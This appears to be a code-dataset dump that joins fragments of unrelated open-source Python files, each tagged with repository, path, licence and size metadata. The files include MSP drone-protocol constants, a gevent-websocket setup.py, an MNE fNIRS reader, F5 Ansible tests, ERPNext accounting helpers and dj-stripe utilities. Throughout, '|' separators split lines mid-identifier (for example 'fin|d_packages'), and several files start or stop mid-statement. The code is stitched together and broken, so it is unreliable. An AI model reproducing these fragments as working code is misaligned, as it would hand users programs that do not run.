MSP_RAW_IMU =102
MSP_SERVO =103
MSP_MOTOR =104
MSP_RC =105
MSP_RAW_GPS =106
MSP_COMP_GPS =107
MSP_ATTITUDE =108
MSP_ALTITUDE =109
MSP_ANALOG =110
MSP_RC_TUNING =111
MSP_PID =112
MSP_BOX =113
MSP_MISC =114
MSP_MOTOR_PINS =115
MSP_BOXNAMES =116
MSP_PIDNAMES =117
MSP_WP =118
MSP_BOXIDS =119
MSP_SERVO_CONF =120
MSP_NAV_STATUS =121
MSP_NAV_CONFIG =122
MSP_MOTOR_3D_CONFIG =124
MSP_RC_DEADBAND =125
MSP_SENSOR_ALIGNMENT =126
MSP_LED_STRIP_MODECOLOR =127
MSP_VOLTAGE_METERS =128
MSP_CURRENT_METERS =129
MSP_BATTERY_STATE =130
MSP_MOTOR_CONFIG =131
MSP_GPS_CONFIG =132
MSP_COMPASS_CONFIG =133
MSP_ESC_SENSOR_DATA =134
MSP_GPS_RESCUE =135
MSP_GPS_RESCUE_PIDS =136
MSP_VTXTABLE_BAND =137
MSP_VTXTABLE_POWERLEVEL =138
MSP_MOTOR_TELEMETRY =139
MSP_SET_RAW_RC =200
MSP_SET_RAW_GPS =201
MSP_SET_PID =202
MSP_SET_BOX =203
MSP_SET_RC_TUNING =204
MSP_ACC_CALIBRATION =205
MSP_MAG_CALIBRATION =206
MSP_SET_MISC =207
MSP_RESET_CONF =208
MSP_SET_WP =209
MSP_SELECT_SETTING =210
MSP_SET_HEAD =211
MSP_SET_SERVO_CONF =212
MSP_SET_MOTOR =214
MSP_SET_NAV_CONFIG =215
MSP_SET_MOTOR_3D_CONFIG =217
MSP_SET_RC_DEADBAND =218
MSP_SET_RESET_CURR_PID =219
MSP_SET_SENSOR_ALIGNMENT =220
MSP_SET_LED_STRIP_MODECOLOR=221
MSP_SET_MOTOR_CONFIG =222
MSP_SET_GPS_CONFIG =223
MSP_SET_COMPASS_CONFIG =224
MSP_SET_GPS_RESCUE =225
MSP_SET_GPS_RESCUE_PIDS =226
MSP_SET_VTXTABLE_BAND =227
MSP_SET_VTXTABLE_POWERLEVEL=228
MSP_BIND =241
MSP_RTC =247
MSP_EEPROM_WRITE =250
MSP_DEBUGMSG =253
MSP_DEBUG =254
IDLE = 0
HEADER_START = 1
HEADER_M = 2
HEADER_ARROW = 3
HEADER_SIZE = 4
HEADER_CMD = 5
HEADER_ERR = 6
PIDITEMS = 10
MESSAGES = {
MSP_RAW_GPS: MSPItem('RAW_GPS', "BBiihH", "fix,numSat,Lat,Lon,Alt,Speed"),
MSP_IDENT: MSPItem('IDENT', "BBBI", "version,multiType,MSPVersion,multiCapability"),
MSP_STATUS: MSPItem('STATUS', "HHHI", "cycleTime,i2cError,present,mode"),
MSP_RAW_IMU: MSPItem('RAW_IMU', "hhhhhhhhh", "AccX,AccY,AccZ,GyrX,GyrY,GyrZ,MagX,MagY,MagZ"),
MSP_SERVO: MSPItem('SERVO', "8h", "servo"),
MSP_MOTOR: MSPItem('MOTOR', "8h", "motor"),
MSP_RC: MSPItem('RC', "8h", "rc"),
MSP_COMP_GPS: MSPItem('COMP_GPS', "HhB", "distanceToHome,directionToHome,update"),
MSP_ATTITUDE: MSPItem('ATTITUDE', "hhh", "roll,pitch,yaw"),
MSP_ALTITUDE: MSPItem('ALTITUDE', "ih", "alt,vspeed"),
MSP_RC_TUNING: MSPItem('RC_TUNING', "BBBBBBB", "RC_Rate,RC_Expo,RollPitchRate,YawRate,DynThrPID,ThrottleMID,ThrottleExpo"),
MSP_BATTERY_STATE: MSPItem('BATTERY_STATE', "BHBHh", "cellCount,capacity,voltage,mah,current"),
MSP_RTC: MSPItem('RTC', "HBBBBBH", "year,mon,mday,hour,min,sec,millis"),
MSP_OSD_CONFIG: MSPItem("OSD_CONFIG",
["BBBBHBBH",
"{os
|
imankulov/gevent-websocket
|
setup.py
|
Python
|
bsd-3-clause
| 946
| 0.002114
|
from setuptools import setup, find_packages
setup(
name="gevent-websocket",
version="0.3.6",
description="Websocket handler for the gevent pywsgi server, a Python network library",
long_description=open("README.rst").read(),
author="Jeffrey Gelens",
author_email="[email protected]",
license="BSD",
url="https://bitbucket.org/Jeffrey/gevent-websocket",
download_url="https://bitbucket.org/Jeffrey/gevent-websocket",
install_requires=("gevent", "greenlet"),
packages=fin
|
d_packages(exclude=["examples","tests"]),
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Operating System ::
|
MacOS :: MacOS X",
"Operating System :: POSIX",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
)
|
OWStimpson/oscar_webstore
|
oscar_webstore_root/forked_apps/catalogue/__init__.py
|
Python
|
bsd-3-clause
| 68
| 0
|
default_app_config = 'fork
|
ed_apps.catalogue.config.Catal
|
ogueConfig'
|
Teekuningas/mne-python
|
mne/io/nirx/nirx.py
|
Python
|
bsd-3-clause
| 13,599
| 0
|
# Authors: Robert Luke <[email protected]>
#
# License: BSD (3-clause)
from configparser import ConfigParser, RawConfigParser
import glob as glob
import re as re
import os.path as op
import numpy as np
from ..base import BaseRaw
from ..constants import FIFF
from ..meas_info import create_info, _format_dig_points
from ...annotations import Annotations
from ...transforms import apply_trans, _get_trans
from ...utils import logger, verbose, fill_doc
from ...utils import warn
@fill_doc
def read_raw_nirx(fname, preload=False, verbose=None):
"""Reader for a NIRX fNIRS recording.
This function has only been tested with NIRScout devices.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
Returns
-------
raw : instance of RawNIRX
A Raw object containing NIRX data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawNIRX(fname, preload, verbose)
def _open(fname):
return open(fname, 'r', encoding='latin-1')
@fill_doc
class RawNIRX(BaseRaw):
"""Raw object from a NIRX fNIRS file.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
@verbose
def __init__(self, fname, preload=False, verbose=None):
from ...externals.pymatreader import read_mat
from ...coreg import get_mni_fiducials # avoid circular import prob
logger.info('Loading %s' % fname)
if fname.endswith('.hdr'):
fname = op.dirname(op.abspath(fname))
if not op.isdir(fname):
raise RuntimeError('The path you specified does not exist.')
# Check if required files exist and store names for later use
files = dict()
keys = ('hdr', 'inf', 'set', 'tpl', 'wl1', 'wl2',
'config.txt', 'probeInfo.mat')
for key in keys:
files[key] = glob.glob('%s/*%s' % (fname, key))
if len(files[key]) != 1:
raise RuntimeError('Expect one %s file, got %d' %
(key, len(files[key]),))
files[key] = files[key][0]
if len(glob.glob('%s/*%s' % (fname, 'dat'))) != 1:
warn("A single dat file was expected in the specified path, but "
"got %d. This may indicate that the file structure has been "
"modified since the measurement was saved." %
(len(glob.glob('%s/*%s' % (fname, 'dat')))))
# Read number of rows/samples of wavelength data
last_sample = -1
with _open(files['wl1']) as fid:
for line in fid:
last_sample += 1
# Read header file
# The header file isn't compliant with the configparser. So all the
# text between comments must be removed before passing to parser
with _open(files['hdr']) as f:
hdr_str = f.read()
hdr_str = re.sub('#.*?#', '', hdr_str, flags=re.DOTALL)
hdr = RawConfigParser()
hdr.read_string(hdr_str)
# Check that the file fo
|
rmat version is supported
if not any(item == hdr['GeneralInfo']['NIRStar'] for item in
["\"15.0\"", "\
|
"15.2\""]):
raise RuntimeError('MNE does not support this NIRStar version'
' (%s)' % (hdr['GeneralInfo']['NIRStar'],))
if "NIRScout" not in hdr['GeneralInfo']['Device']:
warn("Only import of data from NIRScout devices have been "
"thoroughly tested. You are using a %s device. " %
hdr['GeneralInfo']['Device'])
# Parse required header fields
# Extract frequencies of light used by machine
fnirs_wavelengths = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['Wavelengths'])]
# Extract source-detectors
sources = np.asarray([int(s) for s in re.findall(r'(\d+)-\d+:\d+',
hdr['DataStructure']['S-D-Key'])], int)
detectors = np.asarray([int(s) for s in re.findall(r'\d+-(\d+):\d+',
hdr['DataStructure']['S-D-Key'])], int)
# Determine if short channels are present and on which detectors
if 'shortbundles' in hdr['ImagingParameters']:
short_det = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['ShortDetIndex'])]
short_det = np.array(short_det, int)
else:
short_det = []
# Extract sampling rate
samplingrate = float(hdr['ImagingParameters']['SamplingRate'])
# Read participant information file
inf = ConfigParser(allow_no_value=True)
inf.read(files['inf'])
inf = inf._sections['Subject Demographics']
# Store subject information from inf file in mne format
# Note: NIRX also records "Study Type", "Experiment History",
# "Additional Notes", "Contact Information" and this information
# is currently discarded
subject_info = {}
names = inf['name'].split()
if len(names) > 0:
subject_info['first_name'] = \
inf['name'].split()[0].replace("\"", "")
if len(names) > 1:
subject_info['last_name'] = \
inf['name'].split()[-1].replace("\"", "")
if len(names) > 2:
subject_info['middle_name'] = \
inf['name'].split()[-2].replace("\"", "")
# subject_info['birthday'] = inf['age'] # TODO: not formatted properly
subject_info['sex'] = inf['gender'].replace("\"", "")
# Recode values
if subject_info['sex'] in {'M', 'Male', '1'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_MALE
elif subject_info['sex'] in {'F', 'Female', '2'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_FEMALE
# NIRStar does not record an id, or handedness by default
# Read information about probe/montage/optodes
# A word on terminology used here:
# Sources produce light
# Detectors measure light
# Sources and detectors are both called optodes
# Each source - detector pair produces a channel
# Channels are defined as the midpoint between source and detector
mat_data = read_mat(files['probeInfo.mat'], uint16_codec=None)
requested_channels = mat_data['probeInfo']['probes']['index_c']
src_locs = mat_data['probeInfo']['probes']['coords_s3'] / 100.
det_locs = mat_data['probeInfo']['probes']['coords_d3'] / 100.
ch_locs = mat_data['probeInfo']['probes']['coords_c3'] / 100.
# These are all in MNI coordinates, so let's transform them to
# the Neuromag head coordinate frame
mri_head_t, _ = _get_trans('fsaverage', 'mri', 'head')
src_locs = apply_trans(mri_head_t, src_locs)
det_locs = apply_trans(mri_head_t, det_locs)
ch_locs = apply_trans(mri_head_t, ch_locs)
# Set up digitization
dig = get_mni_fiducials('fsaverage', verbose=False)
for fid in dig:
fid['r'] = apply_trans(mri_head_t, fid['r'])
fid['coord_frame'] = FIFF.FIFFV_COORD_HEAD
for ii, ch_loc in enumerate(ch_locs, 1):
dig.append(dict(
kind=FIFF.FIFFV_POINT_EEG, # misnomer but probably okay
r=ch_loc,
ident=ii,
coord_frame=FIFF.FIFFV_COORD_HEAD,
))
dig = _format_dig_points(dig)
del mri_head_t
# Determine requested channel indices
# The wl1 and wl2 files include all possible source - detector pairs.
# But most of these are not relevant. We want to extract only the
# subset requested in the probe file
req_ind = np.array([], int)
for req_idx in range(requested_channels.shape[0]):
sd_idx = np.where((so
|
qma/pants
|
src/python/pants/backend/python/tasks/checkstyle/plugin_subsystem_base.py
|
Python
|
apache-2.0
| 886
| 0.006772
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.subsystem.subsystem import Subsystem
class PluginSubsystemBase(Subsystem):
@classmethod
def register_options(cls, register):
super(PluginSubsystemBase, cls).register_options(register)
# All checks have this option
|
.
register('--skip', default=False,
|
action='store_true',
help='If enabled, skip this style checker.')
def get_plugin(self, python_file):
return self.get_plugin_type()(self.get_options(), python_file)
def get_plugin_type(self):
raise NotImplementedError('get_plugin() not implemented in class {}'.format(type(self)))
|
jamesbdunlop/defaultMayaLibrary
|
tools/rigComponentBuilder.py
|
Python
|
apache-2.0
| 4,466
| 0.005598
|
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import maya.cmds as cmds
import constants as const
import rigBuildLib as complib
reload(complib)
class Component(object):
def __init__(self):
self.cmpdata = {}
self.compName = None
self.compSide = None
self.compColor = None
def defineComponent(self, name, side):
"""
Creates the base layout for the component as it would appear in scene
:param name: The name of the component
:param side: The side of the component
:return:
"""
self.compName = name
self.compSide = side
data = {}
data[name] = {}
data[name]['layers'] = ["input", "output", "control", "parts", "deform", 'definition']
data[name]['inputs'] = ["componentDomain"]
data[name]['parts'] = ["hidden"]
self.setCompColor()
return data
@property
def data(self):
return self.cmpdata
@property
def layer(self):
return self.cmpdata
@property
def name(self):
r
|
eturn self.compName
@property
def side(self):
return self.compSide
@property
def color(self):
return self.compCo
|
lor
def setCompColor(self):
if self.side == "L":
self.compColor = 14
elif self.side == "R":
self.compColor = 13
else:
self.compColor = 25
def addCustomInput(self, name):
grpName = "{}_input".format(name)
inputGrp = complib.createGroup(grpName, self.name, self.side,)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['input'])
self.cmpdata[name] = inputGrp
def addCustomPartsGroup(self, name):
grpName = "{}_{}".format(name, const.GROUP_SUFFIX['master'])
inputGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['parts'])
self.cmpdata[name] = inputGrp
def createComponent(self, name = None, side = None):
"""
Builds the component using the name and side supplied and the definition layers
:param name: The name of the component
:param side: The side of the component eg L R M
:type name: String
:type side: String
:return:
"""
GRPSUFX = const.GROUP_SUFFIX['master']
## Define the component layout now
data = self.defineComponent(name, side)
data['name'] = name
data['side'] = side
## Build the groups
## TOP GROUP
grpName = "{GRPSUFX}".format(**locals())
baseGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(baseGrp, self.name, self.side, 'componentMasterGroup')
## LAYERS
layers = data[name]["layers"]
for eachLayer in layers:
grpName = "{eachLayer}".format(**locals())
lgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(lgrp, self.name, self.side, 'componentGroup')
data[eachLayer] = lgrp
complib.parentTo(lgrp, baseGrp)
### INPUTS
## Doesn't handle buffers, this just does straight single inputs
for eachInput in data[name]['inputs']:
grpName = "{eachInput}_srt".format(**locals())
inputgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputgrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputgrp, data['input'])
if eachInput == 'componentDomain':
data["componentDomain"] = inputgrp
### PARTS
for eachPart in data[name]['parts']:
grpName = "{eachPart}_{GRPSUFX}".format(**locals())
partsgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(partsgrp, self.name, self.side, 'componentGroup')
complib.parentTo(partsgrp, data['parts'])
logger.info('Component {name}_{side} created successfully.'.format(**locals()))
logger.info('Component data: {data}'.format(**locals()))
self.cmpdata = data
logger.info('self.cmpdata: {}'.format(self.cmpdata))
return self.cmpdata
|
alexlo03/ansible
|
test/units/modules/network/f5/test_bigip_gtm_pool.py
|
Python
|
gpl-3.0
| 11,200
| 0.000446
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_gtm_pool import ApiParameters
from library.modules.bigip_gtm_pool import ModuleParameters
from library.modules.bigip_gtm_pool import ModuleManager
from library.modules.bigip_gtm_pool import ArgumentSpec
from library.modules.bigip_gtm_pool import UntypedManager
from library.modules.bigip_gtm_pool import TypedManager
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_gtm_pool import ApiParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleManager
from ansible.modules.network.f5.bigip_gtm_pool import ArgumentSpec
from ansible.modules.network.f5.bigip_gtm_pool import UntypedManager
from ansible.modules.network.f5.bigip_gtm_pool import TypedManager
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
except Imp
|
ortError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python libr
|
ary")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='ratio',
fallback_lb_method='fewest-hops',
fallback_ip='10.10.10.10',
type='a'
)
p = ModuleParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
assert p.type == 'a'
def test_module_parameters_members(self):
args = dict(
partition='Common',
members=[
dict(
server='foo',
virtual_server='bar'
)
]
)
p = ModuleParameters(params=args)
assert len(p.members) == 1
assert p.members[0] == '/Common/foo:bar'
def test_api_parameters(self):
args = dict(
name='foo',
loadBalancingMode='topology',
alternateMode='ratio',
fallbackMode='fewest-hops',
fallbackIp='10.10.10.10'
)
p = ApiParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
def test_api_parameters_members(self):
args = load_fixture('load_gtm_pool_a_with_members_1.json')
p = ApiParameters(params=args)
assert len(p.members) == 3
assert p.members[0] == '/Common/server1:vs1'
assert p.members[1] == '/Common/server1:vs2'
assert p.members[2] == '/Common/server1:vs3'
class TestUntypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'round-robin'
def test_update_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='drop-packet',
fallback_lb_method='cpu',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
current = ApiParameters(params=load_fixture('load_gtm_pool_untyped_default.json'))
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, True])
tm.update_on_device = Mock(return_value=True)
tm.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'topology'
assert results['alternate_lb_method'] == 'drop-packet'
assert results['fallback_lb_method'] == 'cpu'
def test_delete_pool(self, *args):
set_module_args(dict(
name='foo',
state='absent',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, False])
tm.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
class TestTypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
type='a',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.sup
|
informatics-isi-edu/deriva-py
|
deriva/transfer/backup/__main__.py
|
Python
|
apache-2.0
| 361
| 0.00554
|
import sys
from deriva.transfer import DerivaBackupCLI
DESC = "Deriva Catalog Backup Utility - CLI"
INFO = "For m
|
ore information see: https://github.com/informatics-isi-edu/deriva-py"
def mai
|
n():
cli = DerivaBackupCLI(DESC, INFO, hostname_required=True, config_file_required=False)
return cli.main()
if __name__ == '__main__':
sys.exit(main())
|
emmuchira/kps_erp
|
erpnext/accounts/party.py
|
Python
|
gpl-3.0
| 16,798
| 0.025063
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import datetime
from frappe import _, msgprint, scrub
from frappe.defaults import get_user_permissions
from frappe.model.utils import get_fetch_values
from frappe.utils import (add_days, getdate, formatdate, get_first_day, date_diff,
add_years, get_timestamp, nowdate, flt)
from frappe.contacts.doctype.address.address import (get_address_display,
get_default_address, get_company_address)
from frappe.contacts.doctype.contact.contact import get_contact_details, get_default_contact
from erpnext.exceptions import PartyFrozen, PartyDisabled, InvalidAccountCurrency
from erpnext.accounts.utils import get_fiscal_year
from erpnext import get_default_currency, get_company_currency
class DuplicatePartyAccountError(frappe.ValidationError): pass
@frappe.whitelist()
def get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
if not party:
return {}
if not frappe.db.exists(party_type, party):
frappe.throw(_("{0}: {1} does not exists").format(party_type, party))
return _get_party_details(party, account, party_type,
company, posting_date, price_list, currency, doctype, ignore_permissions)
def _get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
out = frappe._dict(set_account_and_due_date(party, account, party_type, company, posting_date, doctype))
party = out[party_type.lower()]
if not ignore_permissions and not frappe.has_permission(party_type, "read", party):
frappe.throw(_("Not permitted for {0}").format(party), frappe.PermissionError)
party = frappe.get_doc(party_type, party)
currency = party.default_currency if party.default_currency else get_company_currency(company)
set_address_details(out, party, party_type, doctype, company)
set_contact_details(out, party, party_type)
set_other_values(out, party, party_type)
set_price_list(out, party, party_type, price_list)
out["taxes_and_charges"] = set_taxes(party.name, party_type, posting_date, company, out.customer_group, out.supplier_type)
if not out.get("currency"):
out["currency"] = currency
# sales team
if party_type=="Customer":
out["sales_team"] = [{
"sales_person": d.sales_person,
"allocated_percentage": d.allocated_percentage or None
} for d in party.get("sales_team")]
return out
def set_address_details(out, party, party_type, doctype=None, company=None):
billing_address_field = "customer_address" if party_type == "Lead" \
else party_type.lower() + "_address"
out[billing_address_field] = get_default_address(party_type, party.name)
if doctype:
out.update(get_fetch_values(doctype, billing_address_field, out[billing_address_field]))
# address display
out.address_display = get_address_display(out[billing_address_field])
# shipping address
if party_type in ["Customer", "Lead"]:
out.shipping_address_name = get_default_address(party_type, party.name, 'is_shipping_address')
out.shipping_address = get_address_display(out["shipping_address_name"])
if doctype:
out.update(get_fetch_values(doctype, 'shipping_address_name', out.shipping_address_name))
if doctype and doctype in ['Delivery Note', 'Sales Invoice']:
out.update(get_company_address(company))
if out.company_address:
out.update(get_fetch_values(doctype, 'company_address', out.company_address))
def set_contact_details(out, party, party_type):
out.contact_person = get_default_contact(party_type, party.name)
if not out.contact_person:
out.update({
"contact_person": None,
"contact_display": None,
"contact_email": None,
"contact_mobile": None,
"contact_phone": None,
"contact_designation": None,
"contact_department": None
})
else:
out.update(get_contact_details(out.contact_person))
def set_other_values(out, party, party_type):
# copy
if party_type=="Customer":
to_copy = ["customer_name", "customer_group", "territory", "language"]
else:
to_copy = ["supplier_name", "supplier_type", "language"]
for f in to_copy:
out[f] = party.get(f)
# fields prepended with default in Customer doctype
for f in ['currency'] \
+ (['sales_partner', 'commission_rate'] if party_type=="Customer" else []):
if party.get("default_" + f):
out[f] = party.get("default_" + f)
def get_default_price_list(party):
"""Return default price list for party (Document object)"""
if party.default_price_list:
return party.default_price_list
if party.doctype == "Customer":
price_list = frappe.db.get_value("Customer Group",
party.customer_group, "default_price_list")
if price_list:
return price_list
return None
def set_price_list(out, party, party_type, given_price_list):
# price list
price_list = filter(None, get_user_permissions().get("Price List", []))
if isinstance(price_list, list):
price_list = price_list[0] if len(price_list)==1 else None
if not price_list:
price_list = get_default_price_list(party)
if not price_list:
price_list = given_price_list
if price_list:
out.price_list_currency = frappe.db.get_value("Price List", price_list, "currency")
out["selling_price_list" if party.doctype=="Customer" else "buying_price_list"] = price_list
def set_account_and_due_date(party, account, party_type, company, posting_date, doctype):
if doctype not in ["Sales Invoice", "Purchase Invoice"]:
# not an invoice
return {
party_type.lower(): party
}
if party:
account = get_party_account(party_type, party, company)
account_fieldname = "debit_to" if party_type=="Customer" else "credit_to"
out = {
party_type.lower(): party,
account_fieldname : account,
"due_date": get_due_date(posting_date, party_type, party, company)
}
return out
@frappe.whitelist()
def get_party_account(party_type, party, company):
"""Returns the account for the given `party`.
Will first search in party (Customer / Supplier) record, if not found,
will search in group (Customer Group / Supplier Type),
finally will return default."""
if not company:
frappe.throw(_("Please select a
|
Company"))
if party:
account = frappe.db.get_value("Party Account",
{"parenttype": party_type, "parent": party, "company": company}, "account")
if not account and party_type in ['Customer', 'Supplier'
|
]:
party_group_doctype = "Customer Group" if party_type=="Customer" else "Supplier Type"
group = frappe.db.get_value(party_type, party, scrub(party_group_doctype))
account = frappe.db.get_value("Party Account",
{"parenttype": party_group_doctype, "parent": group, "company": company}, "account")
if not account and party_type in ['Customer', 'Supplier']:
default_account_name = "default_receivable_account" \
if party_type=="Customer" else "default_payable_account"
account = frappe.db.get_value("Company", company, default_account_name)
existing_gle_currency = get_party_gle_currency(party_type, party, company)
if existing_gle_currency:
if account:
account_currency = frappe.db.get_value("Account", account, "account_currency")
if (account and account_currency != existing_gle_currency) or not account:
account = get_party_gle_account(party_type, party, company)
return account
def get_party_account_currency(party_type, party, company):
def generator():
party_account = get_party_account(party_type, party, company)
return frappe.db.get_value("Account", party_account, "account_currency")
return frappe.local_cache("party_account_currency", (party_type, party, company), generator)
def get_party_gle_currency(party_type, party, company):
def generator():
existing_gle_currency = frappe.db.sql("""select account_currency from `tabGL Entry`
where docstatus=1 and company=%(company)s and party_type=%(party_type)s and party=%(party)s
limit 1""", { "company": company, "party_type": party_type, "party": party })
return existing_gle_currency[0][0] if existing_gle_currency else None
ret
|
jameshiew/dj-stripe
|
djstripe/utils.py
|
Python
|
mit
| 4,844
| 0.002685
|
# -*- coding: utf-8 -*-
"""
.. module:: djstripe.utils.
:synopsis: dj-stripe - Utility functions related to the djstripe app.
.. moduleauthor:: @kavdev, @pydanny, @wahuneke
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
from django.conf import setti
|
ngs
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ImproperlyConfigured
from django.db.models.query import QuerySet
from django.utils import timezone
ANONYMOUS_USER_ERROR_MSG = (
"dj-stripe's payment checking mechanisms require the user "
"be authenticated before use. Please use djan
|
go.contrib.auth's "
"login_required decorator or a LoginRequiredMixin. "
"Please read the warning at "
"http://dj-stripe.readthedocs.org/en/latest/usage.html#ongoing-subscriptions."
)
def subscriber_has_active_subscription(subscriber, plan=None):
"""
Helper function to check if a subscriber has an active subscription.
Throws improperlyConfigured if the subscriber is an instance of AUTH_USER_MODEL
and get_user_model().is_anonymous == True.
Activate subscription rules (or):
* customer has active subscription
If the subscriber is an instance of AUTH_USER_MODEL, active subscription rules (or):
* customer has active subscription
* user.is_superuser
* user.is_staff
:param subscriber: The subscriber for which to check for an active subscription.
:type subscriber: dj-stripe subscriber
:param plan: The plan for which to check for an active subscription. If plan is None and
there exists only one subscription, this method will check if that subscription
is active. Calling this method with no plan and multiple subscriptions will throw
an exception.
:type plan: Plan or string (plan ID)
"""
if isinstance(subscriber, AnonymousUser):
raise ImproperlyConfigured(ANONYMOUS_USER_ERROR_MSG)
if isinstance(subscriber, get_user_model()):
if subscriber.is_superuser or subscriber.is_staff:
return True
from .models import Customer
customer, created = Customer.get_or_create(subscriber)
if created or not customer.has_active_subscription(plan):
return False
return True
def get_supported_currency_choices(api_key):
"""
Pull a stripe account's supported currencies and returns a choices tuple of those supported currencies.
:param api_key: The api key associated with the account from which to pull data.
:type api_key: str
"""
import stripe
stripe.api_key = api_key
account = stripe.Account.retrieve()
supported_payment_currencies = stripe.CountrySpec.retrieve(account["country"])["supported_payment_currencies"]
return [(currency, currency.upper()) for currency in supported_payment_currencies]
def dict_nested_accessor(d, name):
"""
Access a dictionary value, possibly in a nested dictionary.
>>> dict_nested_accessor({'id': 'joe'}, 'id')
"joe"
>>> dict_nested_accessor({'inner': {'id': 'joe'}}, 'inner.id')
"joe"
:type d: dict
"""
names = name.split(".", 1)
if len(names) > 1:
return dict_nested_accessor(d[names[0]], names[1])
else:
return d[name]
def clear_expired_idempotency_keys():
from .models import IdempotencyKey
threshold = timezone.now() - datetime.timedelta(hours=24)
